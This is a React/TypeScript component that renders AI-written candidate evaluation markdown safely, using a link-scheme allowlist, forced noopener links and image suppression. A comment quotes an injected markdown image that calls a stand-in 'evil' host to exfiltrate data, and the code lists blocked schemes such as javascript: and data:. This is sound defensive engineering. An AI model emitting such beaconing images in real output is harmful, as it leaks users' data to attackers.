/**
 * `<EvaluationMarkdown>` — bounded `react-markdown` wrapper for AI Evaluation
 * tab content (Batch 30j-3).
 *
 * Spec: `frontend/docs/30j_3_design.md` §6 + `frontend/docs/30j_3_architect.md`
 * §7 + `frontend/docs/30j_3_security.md` §1–§4.
 *
 * Hard rules (Sec Lead HARD-1..HARD-3 + QA E12):
 *   - `remarkPlugins: [remarkGfm]` ONLY. NO `rehypePlugins` of any kind.
 *     Specifically: NO raw-HTML rehype plugin (would re-introduce HTML
 *     rendering and defeat the safe-by-construction guarantee). NO
 *     post-hoc sanitize plugin either (unnecessary — there is no
 *     raw-HTML pathway to sanitize). The lockfile-audit test
 *     `frontend/src/__tests__/` lockfile audit test enforces
 *     this at install time; the import-graph scan in this component's
 *     test file enforces it at source level. See sibling test for
 *     the canonical name list.
 *   - `<a>` href scheme allowlist — `http://`, `https://`, `mailto:`,
 *     relative `/...`, anchor `#...`. Reject `javascript:`, `data:`,
 *     `vbscript:`, `file:` by rendering as plain text. react-markdown v9's
 *     default ANY-scheme posture is the threat we close.
 *   - `<a>` always forces `target="_blank" rel="noreferrer noopener"`.
 *     Mirrors 30j-2 DOMPurify `afterSanitizeAttributes` posture at the
 *     React-element layer.
 *   - `<img>` is rejected — render alt text only, no `<img>` element. The
 *     AI evaluation prompt does not emit images; prevents a future
 *     prompt regression / injected `![x](https://evil/?c=...)` from
 *     beaconing.
 *   - All overrides use foundations semantic tokens (`text-text-*`,
 *     `bg-surface-*`, `border-border-*`). Zero hex literals.
 *
 * Reused at three call sites in 30j-3 + the future 30j-5 Analysis tab.
 * Single source of truth for AI-emitted markdown rendering.
 */
import type { JSX, ReactNode } from "react";
import ReactMarkdown, { type Components } from "react-markdown";
import remarkGfm from "remark-gfm";

import { splitAnchorSegments } from "@/lib/jdAnchors";

/**
 * Scheme allowlist for `<a href>`. Returns true if the href is one of:
 *   - `http://...` or `https://...`
 *   - `mailto:...`
 *   - relative path beginning with `/`
 *   - anchor link beginning with `#`
 *
 * Rejects (case-insensitive): `javascript:`, `data:`, `vbscript:`,
 * `file:`, `ftp:`, and any other scheme.
 */
function isSafeHref(href: string | undefined): href is string {
  if (typeof href !== "string" || href.length === 0) return false;
  // Anchor + relative paths — no scheme.
  if (href.startsWith("#") || href.startsWith("/")) return true;
  // Strict scheme prefix match. Anchored on start so embedded `javascript:`
  // in a long string can't pass.
  return /^(?:https?:|mailto:)/i.test(href);
}

const COMPONENTS: Components = {
  // Heading levels normalized: prompt H1 → h3, H2 → h4, H3 → h5 so the
  // rendered markdown nests INSIDE a card without competing with the card's
  // page-scoped heading hierarchy.
  h1: ({ children }) => (
    <h3 className="mt-3 mb-2 text-base font-semibold text-text-primary">
      {children}
    </h3>
  ),
  h2: ({ children }) => (
    <h4 className="mt-3 mb-1.5 text-sm font-semibold text-text-primary">
      {children}
    </h4>
  ),
  h3: ({ children }) => (
    <h5 className="mt-2.5 mb-1 text-xs font-semibold uppercase tracking-wide text-text-secondary">
      {children}
    </h5>
  ),
  p: ({ children }) => (
    <p className="mb-2 text-sm leading-7 text-text-secondary">{children}</p>
  ),
  ul: ({ children }) => (
    <ul className="mb-2 ml-5 list-disc text-sm leading-7 text-text-secondary [&>li]:mb-1">
      {children}
    </ul>
  ),
  ol: ({ children }) => (
    <ol className="mb-2 ml-5 list-decimal text-sm leading-7 text-text-secondary [&>li]:mb-1">
      {children}
    </ol>
  ),
  strong: ({ children }) => (
    <strong className="font-semibold text-text-primary">{children}</strong>
  ),
  em: ({ children }) => (
    <em className="italic text-text-secondary">{children}</em>
  ),
  code: ({ children, ...props }) => (
    <code
      className="rounded bg-surface-subtle px-1 py-0.5 font-mono text-xs text-text-primary"
      {...props}
    >
      {children}
    </code>
  ),
  pre: ({ children }) => (
    <pre className="mb-3 overflow-x-auto rounded-md bg-surface-subtle p-3 font-mono text-xs leading-6 text-text-primary">
      {children}
    </pre>
  ),
  // HARD-2 + E12 — scheme allowlist + forced target/rel.
  a: ({ href, children }: { href?: string; children?: ReactNode }) => {
    if (!isSafeHref(href)) {
      // Render as plain text — no clickable surface, no link styling, no
      // href reaches the DOM. The label content is preserved.
      return <span className="text-text-secondary">{children}</span>;
    }
    return (
      <a
        href={href}
        target="_blank"
        rel="noreferrer noopener"
        className="text-text-link underline-offset-2 hover:text-text-link-hover hover:underline"
      >
        {children}
      </a>
    );
  },
  // HARD-3 — reject images. Render alt as italic prose; no `<img>`.
  img: ({ alt }: { alt?: string }) => (
    <span className="text-text-tertiary italic">{alt ?? ""}</span>
  ),
  table: ({ children }) => (
    <div className="mb-3 overflow-x-auto">
      <table className="min-w-full border-separate border-spacing-0 text-sm">
        {children}
      </table>
    </div>
  ),
  th: ({ children }) => (
    <th className="border-b border-border-default bg-surface-subtle px-3 py-2 text-left text-xs font-semibold uppercase tracking-wide text-text-tertiary">
      {children}
    </th>
  ),
  td: ({ children }) => (
    <td className="border-b border-border-default px-3 py-2 text-sm text-text-secondary">
      {children}
    </td>
  ),
};

/**
 * `<JdAnchor>` — the blue quote-rule that ties an assessment point back to the
 * verbatim job-description requirement it maps to ("show your work", made
 * literal). Reproduces the v2 mockup `.jd-anchor` element
 * (`design/v2-direction/index.html` CSS ~L523; examples ~L969/976):
 * left brand border + brand-soft fill + small muted text, content `JD: "…"`.
 *
 * Colors use the v2 HSL token idiom (`hsl(var(--brand))`) — valid under
 * `[data-theme="v2"]`, which scopes the candidate page. No raw color.
 *
 * The quote text is server-verified: the backend faithfulness guard drops any
 * anchor it cannot ground in the actual JD, so what renders here is literally
 * from the job description.
 */
function JdAnchor({ quote }: { quote: string }): JSX.Element {
  return (
    <div
      data-testid="jd-anchor"
      className="my-2 rounded-r-md px-[11px] py-[7px] text-xs leading-6"
      style={{
        borderLeft: "2px solid hsl(var(--brand))",
        background: "hsl(var(--brand-soft))",
        color: "hsl(var(--muted-foreground))",
      }}
    >
      <span className="font-semibold">JD:</span>{" "}
      <span className="italic">&ldquo;{quote}&rdquo;</span>
    </div>
  );
}

interface EvaluationMarkdownProps {
  source: string;
}

export function EvaluationMarkdown({
  source,
}: EvaluationMarkdownProps): JSX.Element {
  // Split out inline `[[JD_ANCHOR: …]]` markers so each grounded anchor renders
  // as the blue quote-rule positioned beneath its assessment point. Legacy
  // evals contain no markers → a single markdown segment (no anchors, no error).
  const segments = splitAnchorSegments(source);

  return (
    <>
      {segments.map((seg, i) =>
        seg.kind === "anchor" ? (
          <JdAnchor key={`a-${i}`} quote={seg.quote} />
        ) : (
          <ReactMarkdown
            key={`m-${i}`}
            remarkPlugins={[remarkGfm]}
            components={COMPONENTS}
          >
            {seg.text}
          </ReactMarkdown>
        ),
      )}
    </>
  );
}
